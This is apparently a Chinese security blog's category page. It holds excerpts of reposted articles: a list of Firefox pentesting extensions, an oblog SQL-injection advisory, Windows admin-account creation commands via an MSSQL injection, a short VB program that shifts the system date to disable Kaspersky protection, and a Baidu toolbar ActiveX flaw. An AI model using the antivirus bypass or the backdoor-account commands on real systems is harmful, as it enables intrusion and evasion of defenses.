分类 ‘技术文章’ 下的日志
Hacking Web 2.0 Applications with Firefox
来源:securityfocus
Introduction
AJAX and interactive web services form the backbone of “web 2.0”applications. This technological transformation brings about newchallenges for security professionals. This article looks at some of the methods, tools and tricks to dissectweb 2.0 applications (including Ajax) and discover security holes 阅读全文 »
Tags: Firefox, Hacking, Web 2.0将Firefox打造成一个渗透测试平台工具
来源:NOSEC
Origin:http://www.security-database.com/toolswatch/Turning-Firefox-to-an-Ethical.html
这篇文档写的确实很有意思,里面提到了Firefox的一些与安全相关的插件.其中有一些我特别喜欢,如用于查找IP地址所在地区的Shazou,太酷了.还有与Cookie相关的几个插件以及方便进行编码的HackBar,再有SpiderZilla都不错.再来两个安全公司就不用混了,呵呵.推荐使用了Firefox的兄弟玩一玩.
这里我也补充一个Firebug, 在Hacking Web 2.0 Applications with Firefox文章中有提到. ; )
原文如下:
Internet is an amazing virtual world where you can"virtually" do anything : gambling, playing, watching movies, shopping,working, “VoIPying”, spying other people and for sure auditing remotesystems.
This article is copyrighted Security-Database.com
The security testers community has a large panel ofsecurity tools, methodologies and much more to perform their pentestsand audit assessments. But what happens if you find yourself weaponless.
No more Top 100 security tools, no more LiveCDs and nomore exploitation frameworks. A security auditor without toolbox islike a cop without gun.
Nevertherless, there is maybe a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by ethical hackers and coders.
This article comes as an update for what we postedpreviously about how to switch your firefox to more than an usualsimple browser. It was about application auditing
This article has been updated to a new Framework. The tool is called FireCAT. And it is mind map based tool. Get it here.
Here is an updated list of useful security auditing extensions :
Information gathering
- Whois and geo-location
- ShowIP: Show the IP address of the current page in the status bar. It alsoallows querying custom services by IP (right mouse button) and Hostname(left mouse button), like whois, netcraft.
- Shazou: The product called Shazou (pronounced Shazoo it is Japanese formapping) enables the user with one-click to map and geo-locate anywebsite they are currently viewing.
- HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.
- Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
- Bibirmer Toolbar: An all-in-one extension. But auditors need to play with the toolbox.It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ).Very useful for information gathering phase
- Enumeration / fingerprinting
- Header Spy: Shows HTTP headers on statusbar
- Header Monitor: This is Firefox extension for display on statusbar panel any HTTPresponse header of top level document returned by a web server.Example: Server (by default), Content-Encoding, Content-Type,X-Powered-By and others.
- Social engineering
- People Search and Public Record:This Firefox extension is a handy menu tool for investigators,reporters, legal professionals, real estate agents, online researchersand anyone interested in doing their own basic people searches andpublic record lookups as well as background research.
- Googling and spidering
- Advanced dork: gives quick access to Google’s Advanced Operators directly from thecontext menu. This could be used to spider a site or scan for hiddenfiles (this spider technique is used via scroogle.org)
- SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.
- View Dependencies: View Dependencies adds a tab to the "page info" window, in which itlists all the files which were loaded to show the current page. (usefulfor a spidering technique)
Security Assessment / Code auditing
- Editors
- JSView: The ’view page source’ menu item now opens files based on thebehavior you choose in the jsview options. This allows you to open thesource code of any web page in a new tab or in an external editor.
- Cert Viewer Plus: Adds two options to the certificate viewer in Firefox or Thunderbird:an X.509 certificate can either be displayed in PEM format (Base64/RFC1421, opens in a new window) or saved to a file (in PEM or DER format -and PKCS#7 provided that the respective patch has been applied – cf.
- Firebug: Firebug integrates with Firefox to put a wealth of development toolsat your fingertips while you browse. You can edit, debug, and monitorCSS, HTML, and JavaScript live in any web page
- XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.
- Headers manipulation
- HeaderMonitor: This is Firefox extension for display on statusbar panel any HTTPresponse header of top level document returned by a web server.Example: Server (by default), Content-Encoding, Content-Type,X-Powered-By and others.
- RefControl : Control what gets sent as the HTTP Referer on a per-site basis.
- User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser
- Cookies manipulation
- Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.
- CookieSwap: CookieSwap is an extension that enables you to maintain numerous setsor "profiles" of cookies that you can quickly swap between whilebrowsing
- httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side
- Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file
- Security auditing
- HackBar: This toolbar will help you in testing sql injections, XSS holes andsite security. It is NOT a tool for executing standard exploits and itwill NOT learn you how to hack a site. Its main purpose is to help adeveloper do security audits on his code.
- Tamper Data : Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
- Chickenfoot: Chickenfoot is a Firefox extension that puts a programmingenvironment in the browser’s sidebar so you can write scripts tomanipulate web pages and automate web browsing. In Chickenfoot, scriptsare written in a superset of Javascript that includes special functionsspecific to web tasks.
Proxy/web utilities
- FoxyProxy: FoxyProxy is an advanced proxy management tool that completelyreplaces Firefox’s proxy configuration. It offers more features thanSwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, etc
- SwitchProxy:SwitchProxy lets you manage and switch between multiple proxyconfigurations quickly and easily. You can also use it as an anonymizerto protect your computer from prying eyes
- POW (Plain Old WebServer): The Plain Old Webserver uses Server-side Javascript (SJS) to run aserver inside your browser. Use it to distribute files from yourbrowser. It supports Server-side JS, GET, POST, uploads, Cookies,SQLite and AJAX. It has security features to password-protect yoursite. Users have created a wiki, chat room and search engine using SJS.
Misc
- Hacks for fun
- Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript (scripts could be download here)
- Encryption
- Fire Encrypter: FireEncrypter is an Firefox extension which gives youencryption/decryption and hashing functionalities right from yourFirefox browser, mostly useful for developers or for education &fun.
- Malware scanner
- QArchive.org web files checker: llowing people to check web files for any malware (viruses, trojans,worms, adware, spyware and other unwanted things) inclusions.
- Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download, any page you are about to visit
- ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with ClamWin.
- Anti Spoof
- refspoof: Easy to pretend to origin from a site by overriding the url referrer(in a http request). — it incorporates this feature by using thepseudo-protocol spoof:// .. thus it’s possible to store the informationin a "hyperlink" – that can be used in any context .. like html pagesor bookmarks
Besides, we keep watching new extensions and we are onthe way to develop a new extension for Nmap and Nessus. So keepwatching us.
Feel free to send us(info[at]security-database[dot]com) any useful information aboutsecurity and audit oriented firefox extensions.
This article is copyrighted Security-Database.com
oblog商业版本4.6注射漏洞,直接拿管理员
影响版本:4.6商业版
发现人:雕牌
来源:http://52cmd.cn
漏洞描述:
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。
漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" 阅读全文 »
实现无net.exe和net1.exe添加系统用户
鬼仔注:老文章了,以前没发过。
来源:hackest[H.S.T]
大家都知道在windows下添加用户可以在CMD下用net命令来实现
格式为:net user username password /add
意思为添加一个用户名为username密码为password的用户
如果要添加进管理员组还可以用如下命令来实现
net localgroup administrators username /add
这样就把用户名为username的用户加进了管理员组
但是如果不用net.exe和net1.exe是不是就无法添加系统用户了呢?
答案是否定的!
假设我们现在手上有一个SA权限的MSSQL注入点
3389开放并允许连接登录
可以通过注入工具执行任意命令
但是管理员把net.exe和net1.exe改名或者直接删除掉了
阅读全文 »
几句话就过卡巴主动防御
鬼仔注:还是利用修改时间达到使卡巴失效的目的。不过据说卡巴下个版本要修正这个问题了。
作者:雪狐
Private Sub Form_Load()
Date = Date - 5000
End Sub
Private Sub Timer1_Timer()
Date = Date + 5000
End
End Sub
很简单的几句话,timer设置15秒即可!
运行程序后日期由正确的日期减去5000天,然后经过15秒后又加上5000天!恢复了原来的时间!
卡巴在这个15秒内停止保护!!
呵呵
很爽了,比网上流行的bat写的好的没法说了!
Tags: 卡巴斯基联众密码的逆向算法
//作者:姜堰市合作银行-姚佩云 www.jynx.com.cn [email protected]
//首发大富翁论坛(www.delphibbs.com)blog,转载请尊重作者成果,保留此信息
闲来无事,每天上联众,联众的密码经过加密后保存在本地注册表里,看看是怎么加密的。下了个ollydbg,一路跟踪,发现算法极其简单,给出Delphi版本的解密算法(加密部分有兴趣的一起来讨论)。算法比较粗糟,谁帮优化一下:)
阅读全文 »
百度超级搜霸远程代码执行漏洞
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
百度超级搜霸是百度公司出品的一款免费的浏览器工具栏,提供百度公司的各种服务。更多信息请参考:
http://bar.baidu.com/sobar/promotion.html
在百度超级搜霸中的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。
Affected Software Versions:
百度超级搜霸5.4(Version of "BaiduBar.dll" is 2.0.2.144)
Details:
阅读全文 »